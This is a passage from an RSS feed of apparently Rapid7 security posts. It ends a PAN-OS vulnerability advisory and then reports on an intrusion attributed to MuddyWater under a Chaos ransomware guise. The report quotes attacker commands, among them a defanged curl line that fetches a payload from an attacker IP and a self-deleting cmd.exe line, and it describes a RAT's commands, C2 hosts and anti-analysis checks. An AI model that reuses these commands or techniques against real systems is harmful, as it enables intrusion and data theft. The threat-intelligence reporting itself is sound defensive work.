style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>Restrict User-ID™ Authentication Portal access to only trusted internal zones. Refer to Step 6 of the </span><a href="https://live.paloaltonetworks.com/t5/general-articles/why-it-s-essential-to-secure-your-management-interface/ta-p/1001286"><span style='font-size: undefined;'>Live Community article</span></a><span style='color:rgb(31, 31, 31);font-size: undefined;'> and the </span><a href="https://knowledgebase.paloaltonetworks.com/KCSArticleDetail?id=kA14u000000CqbiCAC"><span style='font-size: undefined;'>Knowledgebase article</span></a><span style='color:rgb(31, 31, 31);font-size: undefined;'> for instructions on restricting access.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>Disable User-ID™ Authentication Portal entirely if it is not required (Device &gt; User Identification &gt; </span><a href="https://docs.paloaltonetworks.com/ngfw/administration/user-id/map-ip-addresses-to-users/map-ip-addresses-to-usernames-using-captive-portal/configure-captive-portal"><span style='font-size: undefined;'>Authentication Portal Settings</span></a><span style='color:rgb(31, 31, 31);font-size: undefined;'> &gt; uncheck Enable Authentication Portal).</span></p></li></ul><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>Please refer to the vendor </span><a href="https://security.paloaltonetworks.com/CVE-2026-0300"><span style='font-size: undefined;'>advisory</span></a><span style='color:rgb(31, 31, 31);font-size: undefined;'> for the latest guidance.</span></p><h2 style="direction: ltr;"><span style='color:rgb(31, 31, 31);'>Rapid7 customers</span></h2><h3 style="direction: ltr;"><span style='color:rgb(31, 31, 31);'>Exposure Command, InsightVM, and Nexpose</span></h3><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-0300 with authenticated vulnerability checks available in the May 6th, 2026 content release.</span></p><h2 style="direction: ltr;"><span style='color:rgb(31, 31, 31);'>Updates</span></h2><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'><strong>May 6, 2026</strong></span><span style='color:rgb(31, 31, 31);font-size: undefined;'>: Initial publication.</span></p></li><li><span style='color:rgb(31, 31, 31);font-size: undefined;'><strong>May 7, 2026</strong></span><span style='color:rgb(31, 31, 31);font-size: undefined;'>: Updated overview to note the addition to CISA KEV and the Unit 42 threat brief attributing exploitation to CL-STA-1132.</span></li><li><span style='color:rgb(31, 31, 31);font-size: undefined;'><strong>May 13, 2026</strong></span><span style='color:rgb(31, 31, 31);font-size: undefined;'>: Updated Mitigation guidance section to state that patches expected on May 13 have been published.</span></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-critical-buffer-overflow-in-palo-alto-networks-pan-os-user-id-authentication-portal-cve-2026-0300</link>
      <guid isPermaLink="false">blta1635ea29533345b</guid>
      <category><![CDATA[Emergent Threat Response]]></category>
      <category><![CDATA[InsightVM]]></category><dc:creator><![CDATA[Jonah Burgess]]></dc:creator>
      <pubDate>Wed, 06 May 2026 13:27:31 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Muddying the Tracks: The State-Sponsored Shadow Behind Chaos Ransomware]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Executive summary</h2><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>In early 2026, a sophisticated intrusion initially appearing to be a standard Chaos ransomware attack was assessed to be consistent with a targeted state-sponsored operation. While the threat actor operated under the banner of the Chaos ransomware-as-a-service (RaaS) group, forensic analysis revealed the incident was a "false flag" masquerade. Technical artifacts, including a specific code-signing certificate and Command-and-Control (C2) infrastructure, suggest with moderate confidence that this activity is linked to MuddyWater (Seedworm), an Iranian Advanced Persistent Threat (APT) affiliated with the Ministry of Intelligence and Security (MOIS).</span></p><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>The campaign was characterized by a high-touch social engineering phase conducted via Microsoft Teams, where the attackers utilized interactive screen-sharing to harvest credentials and manipulate Multi-Factor Authentication (MFA). Once inside, the group bypassed traditional ransomware workflows, forgoing file encryption in favor of data exfiltration and long-term persistence via remote management tools like DWAgent. This report deconstructs the infection chain and analyzes the custom "Game.exe" Remote Access Trojan (RAT).</span></p><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>Additionally, this explores the process by which MuddyWater is increasingly leveraging the cybercriminal ecosystem to provide plausible deniability for geopolitical espionage and prepositioning, particularly in the US. The strategy highlights the convergence between state-sponsored intrusion activity and criminal tradecraft, where a big “tell” lies in the techniques that were deployed – and those that weren’t.</span></p><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>This overall strategy suggests the primary goal was not financial gain. It is also further proof of the lines blurring against the background of geopolitical tensions, and that attribution is becoming more difficult if teams do not take it upon themselves to conduct proper and thorough research.</span></p><h3 style="direction: ltr;">Rapid7 coverage</h3><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 has coverage for this campaign across both intelligence and detection workflows. The campaign is available in Rapid7’s </span><a href="https://www.rapid7.com/platform/threat-intelligence-tip/" target="_self"><span style='font-size: undefined;'>Intelligence Hub</span></a><span style='font-size: undefined;'>, providing customers with curated context, indicators, and threat actor tradecraft to support awareness, investigation, and prioritization. Relevant detections are also available in InsightIDR, helping security teams identify activity associated with this intrusion pattern across their environments.</span></p><h2 style="direction: ltr;">Chaos ransomware: Profile and targeting</h2><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>Active since February 2025, Chaos is a ransomware-as-a-service (RaaS) operation specializing in big-game hunting (BGH) attacks against high-profile organizations, with reported ransom demands reaching up to $300,000. Despite the name, it is distinct from the Chaos malware builder identified in 2021. The group emerged shortly after the July 2025 law enforcement disruption of BlackSuit infrastructure during Operation Checkmate and is likely composed of former BlackSuit and/or Royal members. To expand its operations, Chaos advertises its affiliate program on cybercrime forums, such as RAMP (prior to its takedown) and RehubCom.</span></p><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>Chaos relies heavily on social engineering and remote access abuse to gain initial access. Rapid7 observed techniques that include spam email flooding combined with voice-based phishing (vishing), often involving impersonation of IT support personnel. Chaos then persuades victims to grant remote access via legitimate tools such as Microsoft Quick Assist, allowing operators to establish an initial foothold.</span></p><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>In line with common ransomware practices, Chaos typically employs double extortion, exfiltrating sensitive data prior to encryption and threatening public disclosure via its data leak site (DLS). The group has also demonstrated triple extortion by threatening distributed denial-of-service (DDoS) attacks against the victim's infrastructure. These capabilities are reportedly offered to affiliates as part of bundled services, representing a notable feature of its RaaS model. Additionally, Chaos has been observed leveraging elements of quadruple extortion, including threats to contact customers or competitors to increase pressure on victims.</span></p><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>A distinguishing characteristic of the group’s DLS is the use of a “blind” countdown timer, which withholds the victim’s identity until expiration, likely intended to accelerate negotiations (Figure 1). As of late March 2026, Chaos has claimed 36 victims and maintained a consistent operational tempo (Figure 2). The group predominantly targets organizations in the United States, with a particular focus on the construction, manufacturing, and business services sectors (Figure 3).</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltab5a8c0bcc9ecd58/69fb3853508297bb338cb5af/Chaos-DLS-screenshot.png" alt="Chaos-DLS-screenshot.png" caption="Figure 1: Screenshot from Chaos’ DLS" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Chaos-DLS-screenshot.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltab5a8c0bcc9ecd58/69fb3853508297bb338cb5af/Chaos-DLS-screenshot.png" data-sys-asset-uid="bltab5a8c0bcc9ecd58" data-sys-asset-filename="Chaos-DLS-screenshot.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 1: Screenshot from Chaos’ DLS" data-sys-asset-alt="Chaos-DLS-screenshot.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 1: Screenshot from Chaos’ DLS</figcaption></div></figure><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt76fd4a0f8e13664f/69fb383cecc142d0847dc39b/chart-claimed-victims.png" alt="chart-claimed-victims.png" caption="Figure 2: Number of claimed victims over time" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="chart-claimed-victims.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt76fd4a0f8e13664f/69fb383cecc142d0847dc39b/chart-claimed-victims.png" data-sys-asset-uid="blt76fd4a0f8e13664f" data-sys-asset-filename="chart-claimed-victims.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 2: Number of claimed victims over time" data-sys-asset-alt="chart-claimed-victims.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 2: Number of claimed victims over time</figcaption></div></figure><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt632a5598045c60d5/69fb383c514fda23e598d4f3/geographic-victim-distribution.png" alt="geographic-victim-distribution.png" caption="Figure 3: Geographic victim distribution" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="geographic-victim-distribution.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt632a5598045c60d5/69fb383c514fda23e598d4f3/geographic-victim-distribution.png" data-sys-asset-uid="blt632a5598045c60d5" data-sys-asset-filename="geographic-victim-distribution.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 3: Geographic victim distribution" data-sys-asset-alt="geographic-victim-distribution.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 3: Geographic victim distribution</figcaption></div></figure><h2 style="direction: ltr;">Incident overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The intrusion that Rapid7 investigated began with a targeted social engineering campaign </span><span style='font-size: undefined;'><strong>leveraging Microsoft Teams</strong></span><span style='font-size: undefined;'>, where the threat actor (TA) engaged employees through external chat requests. By operating interactively through compromised users, the attacker conducted initial discovery, harvested credentials, including MFA manipulation, and quickly transitioned to using legitimate accounts for internal access.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>From there, the TA established persistence using remote access tools such as </span><span style='font-size: undefined;'><strong>DWAgent</strong></span><span style='font-size: undefined;'> and </span><span style='font-size: undefined;'><strong>AnyDesk</strong></span><span style='font-size: undefined;'>, before deploying additional payloads and further control of the environment. Following this, the TA exfiltrated data from the compromised environment and subsequently contacted the victim via email, claiming data theft and initiating ransom negotiations (Figure 4).</span></p><p style="direction: ltr;"><span style='font-size: undefined;'> </span></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltda4f2dfa8cd6daed/69fb4d8d05f9106ebd95e786/FixedDiagram.jpg" alt="FixedDiagram.jpg" caption="Figure 4: Incident breakdown" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="FixedDiagram.jpg" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltda4f2dfa8cd6daed/69fb4d8d05f9106ebd95e786/FixedDiagram.jpg" data-sys-asset-uid="bltda4f2dfa8cd6daed" data-sys-asset-filename="FixedDiagram.jpg" data-sys-asset-contenttype="image/jpeg" data-sys-asset-caption="Figure 4: Incident breakdown" data-sys-asset-alt="FixedDiagram.jpg" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 4: Incident breakdown</figcaption></div></figure><p></p><h3 style="direction: ltr;">Initial Access via social engineering and remote interaction</h3><p style="direction: ltr;"><span style='font-size: undefined;'>The TA achieved initial access through social engineering conducted via Microsoft Teams, where they initiated one-on-one chats with users from a controlled account. During these interactions, the TA established screen-sharing sessions, gaining direct visibility and interactive access to user assets.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>While connected, the TA executed basic discovery commands, accessed files related to the victim’s VPN configuration, and instructed users to enter their credentials into locally created text files. In at least one instance, the TA deployed a remote management tool (AnyDesk) to further facilitate access.</span></p><p style="direction: ltr;">⠀</p><pre language="shell-session">ipconfig /all
nslookup
net start
whoami
ping</pre><p><em>Figure 5: Discovery commands executed by the TA</em></p><p>⠀</p><h3 style="direction: ltr;">Credential harvesting and account compromise</h3><p style="direction: ltr;"><span style='font-size: undefined;'>A key component of the intrusion involved interactive credential harvesting: The TA explicitly instructed victims to enter credentials into locally created text files (</span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>credentials.txt</strong></span></span><span style='font-size: undefined;'>, </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>cred.txt</strong></span></span><span style='font-size: undefined;'>) and to modify MFA configurations to include attacker-controlled devices.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Additionally, Rapid7’s analysis of browser artifacts revealed access to the URL</span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>hxxps[://]adm-pulse[.]com/verify.php</strong></span></span><span style='font-size: undefined;'>.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The URL mimicked a Quick Assist themed phishing page, indicating credential harvesting through impersonation.</span></p><h3 style="direction: ltr;">Establishing initial foothold and remote access</h3><p style="direction: ltr;"><span style='font-size: undefined;'>Following credential compromise, the TA authenticated to internal systems, including a Domain Controller, using multiple compromised accounts. They then established persistent remote access through RDP sessions and deployment of the remote management tool </span><span style='font-size: undefined;'><strong>DWAgent</strong></span><span style='font-size: undefined;'>. The DWAgent installation chain included:</span></p><p>⠀</p><table><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>File name</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Description</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>dwagent.exe</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Remote access tool</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>pythonw.exe</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Cmd version of python interpreter</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>dwagsvc.exe</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>DWAgent service</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>dwaglnc.exe</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Background component of DWAgent</span></p></td></tr></tbody></table><p><em>Table 1: Files observed during installation of DWAgent</em></p><h3 style="direction: ltr;">Payload delivery and execution</h3><p style="direction: ltr;"><span style='font-size: undefined;'>The TA later executed commands via RDP to download additional payloads using curl:</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'><strong>curl hxxp[://]172.86.126[.]208:443/ms_upd.exe -o C:\ProgramData\ms_upd.exe</strong></span></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>After the download, the TA executed the binary </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>ms_upd.exe</strong></span></span><span style='font-size: undefined;'>, initiating a multi-stage infection chain. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Upon successful execution, </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>ms_upd.exe</strong></span></span><span style='font-size: undefined;'> downloaded additional components:</span></p><p>⠀</p><table><colgroup data-width='1416'><col style="width:18.785310734463277%"/><col style="width:44.632768361581924%"/><col style="width:36.5819209039548%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>File name</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>SHA256</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Description</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>WebView2Loader.dll</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>a47cd0dc12f0152d8f05b79e5c86bac9231f621db7b0e90a32f87b98b4e82f3a</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Legitimate DLL</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>Game.exe</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>1319d474d19eb386841732c728acf0c5fe64aa135101c6ceee1bd0369ecf97b6</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Backdoor granting the TA access to the infected machine</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>visualwincomp.txt</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>c86ab27100f2a2939ac0d4a8af511f0a1a8116ba856100aae03bc2ad6cb0f1e0</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Encrypted configuration</span></p></td></tr></tbody></table><p><em>Table 2: Components downloaded by ms_upd.exe</em></p><h3 style="direction: ltr;">Lateral movement </h3><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>The TA expanded access within the environment by leveraging compromised accounts and establishing remote access channels. They used RDP sessions to move between systems, allowing them to operate interactively and access additional resources within the network.</span></p><h3 style="direction: ltr;">Extortion activity and data leak claims</h3><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>The TA distributed emails to multiple users, alleging successful data exfiltration, and provided a </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>.onion</strong></span></span><span style='font-size: undefined;'> link for negotiation. Open-source intelligence (OSINT) collection identified a corresponding entry on the Chaos DLS referencing data; however, all identifying details were redacted, as per the group’s typical “blind” countdown timer. </span></p><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>A subsequent email introduced a new contact address and instructed recipients to locate a note allegedly placed within their Desktop directory containing “access credentials” for a secure chat. Rapid7 conducted a threat hunt across all assets that focused on files created or accessed within Desktop directories and subdirectories and did not identify any artifacts consistent with the TA’s claims. The victim further validated the affected user systems and confirmed the absence of such files. Despite these inconsistencies in the initial proof-of-compromise, the TA later published the stolen data on its DLS in line with modern extortion tactics. The victim confirmed that the leaked data was legitimate.</span></p><h2 style="direction: ltr;">Malware analysis</h2><h3 style="direction: ltr;">ms_upd.exe </h3><p style="direction: ltr;"><span style='font-size: undefined;'>The binary functions as a downloader that begins by collecting basic host information, including computer name, username, and domain. This data is used to generate a unique client identifier, concatenating computer name, username, and tick count, which is sent to the C2 server </span><span style='font-size: undefined;'><span data-type='inlineCode'>moonzonet[.]com</span></span><span style='font-size: undefined;'> via a </span><span style='font-size: undefined;'><span data-type='inlineCode'>/register</span></span><span style='font-size: undefined;'> request, followed by periodic </span><span style='font-size: undefined;'><span data-type='inlineCode'>/check</span></span><span style='font-size: undefined;'> requests to determine the execution flow.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Based on the C2 response, the malware either proceeds when receiving an “approved” status or retries registration, if instructed. Once approved, it reports a “downloading” status and prepares a working directory under the user’s Downloads folder (falling back to</span><span style='font-size: undefined;'><em> </em></span><span style='font-size: undefined;'><span data-type='inlineCode'><em>C:\Users\Public\Downloads</em></span></span><span style='font-size: undefined;'> if necessary).</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The dropper then retrieves three payload components from the C2:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'>Game.dll</span></span><span style='font-size: undefined;'> (saved as </span><span style='font-size: undefined;'><span data-type='inlineCode'>WebView2Loader.dll</span></span><span style='font-size: undefined;'>)</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'>Game.exe</span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'>Game.config</span></span><span style='font-size: undefined;'> (saved as </span><span style='font-size: undefined;'><span data-type='inlineCode'>visualwincomp.txt</span></span><span style='font-size: undefined;'>)</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>If all downloads succeed, the malware reports a “running” status and executes the primary payload - </span><span style='font-size: undefined;'><span data-type='inlineCode'>Game.exe</span></span><span style='font-size: undefined;'>. Execution success is monitored, with the result communicated back to the C2 as either “success” or “error”. Upon successful execution, the dropper triggers a self-deletion routine via a delayed command </span><span style='font-size: undefined;'><span data-type='inlineCode'>cmd.exe /c ping 127.0.0.1 -n 6 &gt; nul && del /f /q \"%s\"</span></span><span style='font-size: undefined;'>.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt44e5ab332b3eed1a/69fb399e4ce1e2c3f8a7cf96/ms-upd-main-function-snippet.png" alt="ms-upd-main-function-snippet.png" caption="Figure 6: Snippet from the main function of ms_upd.exe " class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="ms-upd-main-function-snippet.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt44e5ab332b3eed1a/69fb399e4ce1e2c3f8a7cf96/ms-upd-main-function-snippet.png" data-sys-asset-uid="blt44e5ab332b3eed1a" data-sys-asset-filename="ms-upd-main-function-snippet.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 6: Snippet from the main function of ms_upd.exe" data-sys-asset-alt="ms-upd-main-function-snippet.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 6: Snippet from the main function of ms_upd.exe</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>As seen in Figure 6, the malware doesn’t use any form of obfuscation to hide its purpose - API imports are statically resolved, and strings are stored in a plaintext form. This simplicity suggests the tool was likely developed for limited or single-use deployment.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>At the time of writing, only two samples have been observed in public repositories, both exhibiting identical functionality.</span></p><h3 style="direction: ltr;">Game.exe</h3><p style="direction: ltr;"><span style='font-size: undefined;'>Game.exe is a custom RAT that masquerades as a legitimate </span><span style='font-size: undefined;'><strong>Microsoft WebView2 application</strong></span><span style='font-size: undefined;'>. Analysis of the binary's PDB path </span><span style='font-size: undefined;'><span data-type='inlineCode'><em><strong>C:\Users\pc\Downloads\WebView2Samples-main\WebView2Samples-main\SampleApps\WebView2APISample\Release\x64\WebView2APISample.pdb</strong></em></span></span><span style='font-size: undefined;'> confirms that the developer trojanized the official Microsoft WebView2APISample project: </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>https://github.com/MicrosoftEdge/WebView2Samples/tree/main/SampleApps/WebView2APISample</strong></span></span><span style='font-size: undefined;'>. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The malware deviates from the dropper in a way that it implements some obfuscation and anti analysis techniques: </span></p><p></p><table><colgroup data-width='1436'><col style="width:22.56267409470752%"/><col style="width:20.264623955431755%"/><col style="width:25.13927576601671%"/><col style="width:32.03342618384401%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>ATT&CK ID</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Technique</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Purpose</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Example</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1027.007</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Dynamic API and DLL resolution</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Hide the malware functionality</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Usage of LoadLibraryA() and GetProcAddress() APIs</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1027</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>String Obfuscation</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Hide sensitive strings from AV solutions</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Names of DLLs, APIs, registry paths</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1497.001</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Sandbox Detection</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Search for known analysis-related DLLs that are loaded into the current process</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>sbiedll.dll, dbghelp.dll, api_log.dll, vmcheck.dll,  wpespy.dll</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1497.001</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Virtual Machine Detection via CPU</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Compare the processor name string against a list of virtualization-related keywords</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Virtual, VMWare, KVM, Hyper-V</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1082 </span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Removable Drive Enumeration</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Enumerate logical drives and check if any removable drives are present</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Usage of GetLogicalDrives() and GetDriveTypesA() to enumerate logical drives and compare their type against DRIVE_REMOVABLE</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1497.003 </span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Sleep / Timing Check</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Identify sandbox time-skipping mechanisms or identify hooked timing APIs</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>GetTickCount() followed by Sleep(1000) and another GetTickCount() to verify if approximately one second elapsed</span></p></td></tr></tbody></table><p><em>Table 3: Anti analysis / anti detection techniques used by Game.exe</em></p><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>If the malware does not detect an analysis environment,, it establishes persistence by self-installing into a randomized directory under </span><span style='font-size: undefined;'><span data-type='inlineCode'><em>C:\ProgramData\visualwincomp-&lt;random&gt;\</em></span></span><span style='font-size: undefined;'>, where it copies itself alongside a legitimate </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>WebView2Loader.dll</strong></span></span><span style='font-size: undefined;'> and an encrypted configuration file, </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>visualwincomp.txt</strong></span></span><span style='font-size: undefined;'>.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Additionally, the malware enforces single execution on an infected host by registering the mutex </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>ATTRIBUTES_ObjectKernel</strong></span></span><span style='font-size: undefined;'>.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The RAT decrypts its configuration using </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>AES-256-GCM</strong></span></span><span style='font-size: undefined;'> to extract the attacker’s C2 server hostname </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>uploadfiler[.]com</strong></span></span><span style='font-size: undefined;'> and port </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>443</strong></span></span><span style='font-size: undefined;'>. The malware first registers the victim by sending registration information such as computer name, username, and privilege level to the </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>/home</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>endpoint. Once registered, it enters an infinite loop polling </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>/index.php</strong></span></span><span style='font-size: undefined;'> every 60 seconds. The RAT features 12 core capabilities including arbitrary command execution via hidden </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>cmd.exe</strong></span></span><span style='font-size: undefined;'> or encoded </span><span style='font-size: undefined;'><strong>PowerShell</strong></span><span style='font-size: undefined;'> sessions; file uploads with retry logic; file deletion; and the establishment of persistent interactive shells. Command results and execution status are reported back to the </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>/profile</strong></span></span><span style='font-size: undefined;'> endpoint. </span></p><p></p><table><colgroup data-width='583'><col style="width:29.674099485420243%"/><col style="width:70.32590051457976%"/></colgroup><thead><tr><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Command</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Description</strong></span></p></th></tr></thead><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>run_cmd</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Execute command via cmd.exe </span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>run_powershell</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Execute command via PowerShell </span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>upload</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Write base64-encoded file</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>upload_chunk</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chunked file upload with append mode</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>delete_file</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Delete a file</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>cmd_start</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Start interactive cmd.exe shell</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>cmd_input</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Send input to interactive 